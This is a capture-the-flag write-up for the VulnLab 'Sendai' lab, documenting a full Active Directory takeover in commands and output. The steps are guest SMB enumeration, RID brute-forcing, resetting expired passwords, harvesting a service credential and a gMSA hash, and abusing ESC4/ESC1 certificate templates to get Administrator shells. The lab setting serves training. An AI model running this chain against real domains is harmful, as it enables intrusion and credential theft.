VulnLab Sendai
VulnLab Sendai
VulnLab Sendai
Sendai
Recon
1
2
└─$ rustscan -g -a 10.10.125.31 -r 1-65535
10.10.125.31 -> [53,80,88,139,389,445,443,464,593,636,135,3268,3269,5985,9389,49664,49668,49669,49670]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
└─$ nmap -sC -sV -p53,80,88,139,389,445,443,464,593,636,135,3268,3269,5985,9389,49664,49668,49669,49670 10.10.125.31
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-23 19:35 +05
Nmap scan report for 10.10.125.31
Host is up (0.27s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open tcpwrapped
|_http-title: IIS Windows Server
|_http-server-header: Microsoft-IIS/10.0
88/tcp filtered kerberos-sec
135/tcp open tcpwrapped
139/tcp open tcpwrapped
389/tcp filtered ldap
443/tcp open tcpwrapped
|_http-server-header: Microsoft-IIS/10.0
| ssl-cert: Subject: commonName=dc.sendai.vl
| Subject Alternative Name: DNS:dc.sendai.vl
| Not valid before: 2023-07-18T12:39:21
|_Not valid after: 2024-07-18T00:00:00
|_ssl-date: TLS randomness does not represent time
445/tcp open tcpwrapped
464/tcp filtered kpasswd5
593/tcp open tcpwrapped
636/tcp filtered ldapssl
3268/tcp filtered globalcatLDAP
3269/tcp filtered globalcatLDAPssl
5985/tcp open tcpwrapped
9389/tcp open tcpwrapped
49664/tcp filtered unknown
49668/tcp open tcpwrapped
49669/tcp filtered unknown
49670/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: -1m18s
| smb2-time:
| date: 2024-12-23T14:34:47
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.24 seconds
User
There is anonymous authentication on SMB.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ nxc smb 10.10.125.31 -u 'guest' -p '' --shares
SMB 10.10.125.31 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.125.31 445 DC [+] sendai.vl\guest:
SMB 10.10.125.31 445 DC [*] Enumerated shares
SMB 10.10.125.31 445 DC Share Permissions Remark
SMB 10.10.125.31 445 DC ----- ----------- ------
SMB 10.10.125.31 445 DC ADMIN$ Remote Admin
SMB 10.10.125.31 445 DC C$ Default share
SMB 10.10.125.31 445 DC config
SMB 10.10.125.31 445 DC IPC$ READ Remote IPC
SMB 10.10.125.31 445 DC NETLOGON Logon server share
SMB 10.10.125.31 445 DC sendai READ company share
SMB 10.10.125.31 445 DC SYSVOL Logon server share
SMB 10.10.125.31 445 DC Users READ
There’s interesting note regarding some incident
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
└─$ smbclient.py guest:''@10.10.125.31
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
Type help for list of commands
# use sendai
# ls
drw-rw-rw- 0 Tue Jul 18 23:31:04 2023 .
drw-rw-rw- 0 Wed Jul 19 20:11:25 2023 ..
drw-rw-rw- 0 Tue Jul 11 19:26:34 2023 hr
-rw-rw-rw- 1372 Tue Jul 18 23:34:15 2023 incident.txt
drw-rw-rw- 0 Tue Jul 18 19:16:46 2023 it
drw-rw-rw- 0 Tue Jul 11 19:26:34 2023 legal
drw-rw-rw- 0 Tue Jul 18 19:17:35 2023 security
drw-rw-rw- 0 Tue Jul 11 19:26:34 2023 transfer
# cat incident.txt
Dear valued employees,
We hope this message finds you well. We would like to inform you about an important security update regarding user account passwords. Recently, we conducted a thorough penetration test, which revealed that a significant number of user accounts have weak and insecure passwords.
To address this concern and maintain the highest level of security within our organization, the IT department has taken immediate action. All user accounts with insecure passwords have been expired as a precautionary measure. This means that affected users will be required to change their passwords upon their next login.
We kindly request all impacted users to follow the password reset process promptly to ensure the security and integrity of our systems. Please bear in mind that strong passwords play a crucial role in safeguarding sensitive information and protecting our network from potential threats.
If you need assistance or have any questions regarding the password reset procedure, please don't hesitate to reach out to the IT support team. They will be more than happy to guide you through the process and provide any necessary support.
Thank you for your cooperation and commitment to maintaining a secure environment for all of us. Your vigilance and adherence to robust security practices contribute significantly to our collective safety.
#
Let’s perform rid-brute
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
└─$ nxc smb 10.10.125.31 -u 'guest' -p '' --rid-brute 10000
SMB 10.10.125.31 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.125.31 445 DC [+] sendai.vl\guest:
SMB 10.10.125.31 445 DC 498: SENDAI\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.125.31 445 DC 500: SENDAI\Administrator (SidTypeUser)
SMB 10.10.125.31 445 DC 501: SENDAI\Guest (SidTypeUser)
SMB 10.10.125.31 445 DC 502: SENDAI\krbtgt (SidTypeUser)
SMB 10.10.125.31 445 DC 512: SENDAI\Domain Admins (SidTypeGroup)
SMB 10.10.125.31 445 DC 513: SENDAI\Domain Users (SidTypeGroup)
SMB 10.10.125.31 445 DC 514: SENDAI\Domain Guests (SidTypeGroup)
SMB 10.10.125.31 445 DC 515: SENDAI\Domain Computers (SidTypeGroup)
SMB 10.10.125.31 445 DC 516: SENDAI\Domain Controllers (SidTypeGroup)
SMB 10.10.125.31 445 DC 517: SENDAI\Cert Publishers (SidTypeAlias)
SMB 10.10.125.31 445 DC 518: SENDAI\Schema Admins (SidTypeGroup)
SMB 10.10.125.31 445 DC 519: SENDAI\Enterprise Admins (SidTypeGroup)
SMB 10.10.125.31 445 DC 520: SENDAI\Group Policy Creator Owners (SidTypeGroup)
SMB 10.10.125.31 445 DC 521: SENDAI\Read-only Domain Controllers (SidTypeGroup)
SMB 10.10.125.31 445 DC 522: SENDAI\Cloneable Domain Controllers (SidTypeGroup)
SMB 10.10.125.31 445 DC 525: SENDAI\Protected Users (SidTypeGroup)
SMB 10.10.125.31 445 DC 526: SENDAI\Key Admins (SidTypeGroup)
SMB 10.10.125.31 445 DC 527: SENDAI\Enterprise Key Admins (SidTypeGroup)
SMB 10.10.125.31 445 DC 553: SENDAI\RAS and IAS Servers (SidTypeAlias)
SMB 10.10.125.31 445 DC 571: SENDAI\Allowed RODC Password Replication Group (SidTypeAlias)
SMB 10.10.125.31 445 DC 572: SENDAI\Denied RODC Password Replication Group (SidTypeAlias)
SMB 10.10.125.31 445 DC 1000: SENDAI\DC$ (SidTypeUser)
SMB 10.10.125.31 445 DC 1101: SENDAI\DnsAdmins (SidTypeAlias)
SMB 10.10.125.31 445 DC 1102: SENDAI\DnsUpdateProxy (SidTypeGroup)
SMB 10.10.125.31 445 DC 1103: SENDAI\SQLServer2005SQLBrowserUser$DC (SidTypeAlias)
SMB 10.10.125.31 445 DC 1104: SENDAI\sqlsvc (SidTypeUser)
SMB 10.10.125.31 445 DC 1105: SENDAI\websvc (SidTypeUser)
SMB 10.10.125.31 445 DC 1107: SENDAI\staff (SidTypeGroup)
SMB 10.10.125.31 445 DC 1108: SENDAI\Dorothy.Jones (SidTypeUser)
SMB 10.10.125.31 445 DC 1109: SENDAI\Kerry.Robinson (SidTypeUser)
SMB 10.10.125.31 445 DC 1110: SENDAI\Naomi.Gardner (SidTypeUser)
SMB 10.10.125.31 445 DC 1111: SENDAI\Anthony.Smith (SidTypeUser)
SMB 10.10.125.31 445 DC 1112: SENDAI\Susan.Harper (SidTypeUser)
SMB 10.10.125.31 445 DC 1113: SENDAI\Stephen.Simpson (SidTypeUser)
SMB 10.10.125.31 445 DC 1114: SENDAI\Marie.Gallagher (SidTypeUser)
SMB 10.10.125.31 445 DC 1115: SENDAI\Kathleen.Kelly (SidTypeUser)
SMB 10.10.125.31 445 DC 1116: SENDAI\Norman.Baxter (SidTypeUser)
SMB 10.10.125.31 445 DC 1117: SENDAI\Jason.Brady (SidTypeUser)
SMB 10.10.125.31 445 DC 1118: SENDAI\Elliot.Yates (SidTypeUser)
SMB 10.10.125.31 445 DC 1119: SENDAI\Malcolm.Smith (SidTypeUser)
SMB 10.10.125.31 445 DC 1120: SENDAI\Lisa.Williams (SidTypeUser)
SMB 10.10.125.31 445 DC 1121: SENDAI\Ross.Sullivan (SidTypeUser)
SMB 10.10.125.31 445 DC 1122: SENDAI\Clifford.Davey (SidTypeUser)
SMB 10.10.125.31 445 DC 1123: SENDAI\Declan.Jenkins (SidTypeUser)
SMB 10.10.125.31 445 DC 1124: SENDAI\Lawrence.Grant (SidTypeUser)
SMB 10.10.125.31 445 DC 1125: SENDAI\Leslie.Johnson (SidTypeUser)
SMB 10.10.125.31 445 DC 1126: SENDAI\Megan.Edwards (SidTypeUser)
SMB 10.10.125.31 445 DC 1127: SENDAI\Thomas.Powell (SidTypeUser)
SMB 10.10.125.31 445 DC 1128: SENDAI\ca-operators (SidTypeGroup)
SMB 10.10.125.31 445 DC 1129: SENDAI\admsvc (SidTypeGroup)
SMB 10.10.125.31 445 DC 1130: SENDAI\mgtsvc$ (SidTypeUser)
SMB 10.10.125.31 445 DC 1131: SENDAI\support (SidTypeGroup)
1
└─$ cat rid-brute.txt| grep SidTypeUser | awk '{ print $6}' | cut -d '\' -f 2 > users.txt
Trying username as password didn’t work, but using empty passwords show that Thomas.Powell and Elliot.Yates have to change their passwords
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
└─$ nxc smb 10.10.125.31 -u users.txt -p '' --continue-on-success --no-bruteforce
SMB 10.10.125.31 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.125.31 445 DC [-] sendai.vl\Administrator: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [+] sendai.vl\Guest:
SMB 10.10.125.31 445 DC [-] sendai.vl\krbtgt: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\DC$: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\sqlsvc: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\websvc: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Dorothy.Jones: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Kerry.Robinson: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Naomi.Gardner: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Anthony.Smith: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Susan.Harper: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Stephen.Simpson: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Marie.Gallagher: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Kathleen.Kelly: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Norman.Baxter: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Jason.Brady: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Elliot.Yates: STATUS_PASSWORD_MUST_CHANGE
SMB 10.10.125.31 445 DC [-] sendai.vl\Malcolm.Smith: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Lisa.Williams: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Ross.Sullivan: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Clifford.Davey: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Declan.Jenkins: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Lawrence.Grant: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Leslie.Johnson: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Megan.Edwards: STATUS_LOGON_FAILURE
SMB 10.10.125.31 445 DC [-] sendai.vl\Thomas.Powell: STATUS_PASSWORD_MUST_CHANGE
SMB 10.10.125.31 445 DC [-] sendai.vl\mgtsvc$: STATUS_LOGON_FAILURE
Let’s change their passwords
1
2
3
4
5
6
7
8
9
└─$ changepasswd.py sendai.vl/Elliot.Yates@10.10.125.31 -newpass 'P@ssw0rd!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Current password:
[*] Changing the password of sendai.vl\Elliot.Yates
[*] Connecting to DCE/RPC as sendai.vl\Elliot.Yates
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
1
2
3
4
5
6
7
8
9
└─$ changepasswd.py sendai.vl/Thomas.Powell@10.10.125.31 -newpass 'P@ssw0rd!'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Current password:
[*] Changing the password of sendai.vl\Thomas.Powell
[*] Connecting to DCE/RPC as sendai.vl\Thomas.Powell
[!] Password is expired or must be changed, trying to bind with a null session.
[*] Connecting to DCE/RPC as null session
[*] Password was changed successfully.
Both can read config share
1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ nxc smb 10.10.125.31 -u Thomas.Powell -p 'P@ssw0rd!' --shares
SMB 10.10.125.31 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.125.31 445 DC [+] sendai.vl\Thomas.Powell:P@ssw0rd!
SMB 10.10.125.31 445 DC [*] Enumerated shares
SMB 10.10.125.31 445 DC Share Permissions Remark
SMB 10.10.125.31 445 DC ----- ----------- ------
SMB 10.10.125.31 445 DC ADMIN$ Remote Admin
SMB 10.10.125.31 445 DC C$ Default share
SMB 10.10.125.31 445 DC config READ,WRITE
SMB 10.10.125.31 445 DC IPC$ READ Remote IPC
SMB 10.10.125.31 445 DC NETLOGON READ Logon server share
SMB 10.10.125.31 445 DC sendai READ,WRITE company share
SMB 10.10.125.31 445 DC SYSVOL READ Logon server share
SMB 10.10.125.31 445 DC Users READ
1
2
3
4
5
6
7
8
9
10
11
12
13
14
└─$ nxc smb 10.10.125.31 -u Elliot.Yates -p 'P@ssw0rd!' --shares
SMB 10.10.125.31 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.125.31 445 DC [+] sendai.vl\Elliot.Yates:P@ssw0rd!
SMB 10.10.125.31 445 DC [*] Enumerated shares
SMB 10.10.125.31 445 DC Share Permissions Remark
SMB 10.10.125.31 445 DC ----- ----------- ------
SMB 10.10.125.31 445 DC ADMIN$ Remote Admin
SMB 10.10.125.31 445 DC C$ Default share
SMB 10.10.125.31 445 DC config READ,WRITE
SMB 10.10.125.31 445 DC IPC$ READ Remote IPC
SMB 10.10.125.31 445 DC NETLOGON READ Logon server share
SMB 10.10.125.31 445 DC sendai READ,WRITE company share
SMB 10.10.125.31 445 DC SYSVOL READ Logon server share
SMB 10.10.125.31 445 DC Users READ
Inside we find .sqlconfig file, which contains sqlsvc creds
1
2
3
4
5
6
7
8
9
10
11
12
└─$ smbclient.py Elliot.Yates:'P@ssw0rd!'@10.10.125.31
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Type help for list of commands
# use config
# ls
drw-rw-rw- 0 Mon Dec 23 19:58:03 2024 .
drw-rw-rw- 0 Wed Jul 19 20:11:25 2023 ..
-rw-rw-rw- 78 Tue Jul 11 18:57:10 2023 .sqlconfig
# cat .sqlconfig
Server=dc.sendai.vl,1433;Database=prod;User Id=sqlsvc;Password=<REDACTED>;
#
Creds work
1
2
3
└─$ nxc smb 10.10.125.31 -u sqlsvc -p '<REDACTED>'
SMB 10.10.125.31 445 DC [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:sendai.vl) (signing:True) (SMBv1:False)
SMB 10.10.125.31 445 DC [+] sendai.vl\sqlsvc:<REDACTED>
Nothing new in shares, let’s enumerate with bloodhound
1
2
3
4
└─$ bloodhound-python -d 'sendai.vl' -u 'sqlsvc' -p '<REDACTED>' -c all -ns 10.10.125.31 --zip
INFO: Found AD domain: sendai.vl
INFO: Getting TGT for user
<SNIP>
Seems like both Thomas.Powell and Elliot.Yates have GenericAll rights over ADMSVC group, which can read gMSA password of MGTSVC$
Let’s abuse this path
1
2
└─$ ~/tools/bloodyAD/bloodyAD.py --host 10.10.125.31 -u Elliot.Yates -p 'P@ssw0rd!' -d sendai.vl add groupMember ADMSVC Elliot.Yates
[+] Elliot.Yates added to ADMSVC
Now we can read gMSA password
1
2
3
4
5
└─$ nxc ldap 10.10.125.31 -u Elliot.Yates -p 'P@ssw0rd!' --gmsa
LDAP 10.10.125.31 389 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:sendai.vl)
LDAPS 10.10.125.31 636 DC [+] sendai.vl\Elliot.Yates:P@ssw0rd!
LDAPS 10.10.125.31 636 DC [*] Getting GMSA Passwords
LDAPS 10.10.125.31 636 DC Account: mgtsvc$ NTLM: <REDACTED>
By using new creds we can connect via winrm
1
2
3
4
5
6
7
8
9
10
└─$ evil-winrm -u 'mgtsvc$' -H <REDACTED> -i 10.10.125.31
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mgtsvc$\Documents>
Root
During enumeration with PrivescCheck we find that there is helpdesk service running with credentials
1
2
3
4
5
6
7
8
<SNIP>
Name : Support
DisplayName :
ImagePath : C:\WINDOWS\helpdesk.exe -u clifford.davey -p <REDACTED> -k netsvcs
User : LocalSystem
StartMode : Automatic
<SNIP>
The user is a member of CA-Operators group
If we enumerate with certipy we see that SendaiComputer tempalte is vulnerable to ESC4
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
Certificate Templates
0
Template Name : SendaiComputer
Display Name : SendaiComputer
Certificate Authorities : sendai-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : False
Certificate Name Flag : SubjectAltRequireDns
Enrollment Flag : AutoEnrollment
Private Key Flag : 16842752
Extended Key Usage : Server Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 100 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 4096
Permissions
Enrollment Permissions
Enrollment Rights : SENDAI.VL\Domain Admins
SENDAI.VL\Domain Computers
SENDAI.VL\Enterprise Admins
Object Control Permissions
Owner : SENDAI.VL\Administrator
Full Control Principals : SENDAI.VL\ca-operators
Write Owner Principals : SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
SENDAI.VL\Administrator
SENDAI.VL\ca-operators
Write Dacl Principals : SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
SENDAI.VL\Administrator
SENDAI.VL\ca-operators
Write Property Principals : SENDAI.VL\Domain Admins
SENDAI.VL\Enterprise Admins
SENDAI.VL\Administrator
SENDAI.VL\ca-operators
[!] Vulnerabilities
ESC4 : 'SENDAI.VL\\ca-operators' has dangerous permissions
A template is deemed misconfigured at the access control level when it contains Access Control Entries (ACEs) that inadvertently grant editing permissions to unintended or otherwise unprivileged AD principals, potentially allowing them to modify sensitive security settings within the template. If we have the appropriate rights over a template, we can make it vulnerable to attacks such as ESC1. Let’s abuse it by copying the template
1
2
3
4
5
6
└─$ certipy template -dc-ip 10.10.125.31 -dns-tcp -ns 10.10.125.31 -u clifford.davey -p '<REDACTED>' -template SendaiComputer -save-old
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Saved old configuration for 'SendaiComputer' to 'SendaiComputer.json'
[*] Updating certificate template 'SendaiComputer'
[*] Successfully updated 'SendaiComputer'
Now if we enumerate templates again, we will see that it’s vulnerable to ESC1
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
Certificate Templates
0
Template Name : SendaiComputer
Display Name : SendaiComputer
Certificate Authorities : sendai-DC-CA
Enabled : True
Client Authentication : True
Enrollment Agent : True
Any Purpose : True
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : None
Private Key Flag : ExportableKey
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Validity Period : 5 years
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Permissions
Object Control Permissions
Owner : SENDAI.VL\Administrator
Full Control Principals : SENDAI.VL\Authenticated Users
Write Owner Principals : SENDAI.VL\Authenticated Users
Write Dacl Principals : SENDAI.VL\Authenticated Users
Write Property Principals : SENDAI.VL\Authenticated Users
[!] Vulnerabilities
ESC1 : 'SENDAI.VL\\Authenticated Users' can enroll, enrollee supplies subject and template allows client authentication
ESC2 : 'SENDAI.VL\\Authenticated Users' can enroll and template can be used for any purpose
ESC3 : 'SENDAI.VL\\Authenticated Users' can enroll and template has Certificate Request Agent EKU set
ESC4 : 'SENDAI.VL\\Authenticated Users' has dangerous permissions
Now, we can request certificate
1
2
3
4
5
6
7
8
9
└─$ certipy req -dc-ip 10.10.125.31 -dns-tcp -ns 10.10.125.31 -u clifford.davey -p '<REDACTED>' -ca sendai-DC-CA -upn Administrator -template SendaiComputer
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 5
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
Retrieve the hash
1
2
3
4
5
6
7
8
9
└─$ certipy auth -pfx administrator.pfx -username Administrator -domain sendai.vl -dc-ip 10.10.125.31
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@sendai.vl
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@sendai.vl': aad3b435b51404eeaad3b435b51404ee:<REDACTED>
Now we can connect to as administrator
1
2
3
4
5
6
7
8
9
10
11
└─$ evil-winrm -u administrator -H <REDACTED> -i 10.10.125.31
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Or we can login using the ticket (need to add domain to /etc/hosts)
1
2
3
4
5
└─$ KRB5CCNAME=administrator.ccache smbexec.py -k -no-pass dc.sendai.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>
https://api.vulnlab.com/api/v1/share?id=fbf67db6-f8b5-4ea3-9694-01c981d9f37c
This post is licensed under CC BY 4.0 by the author.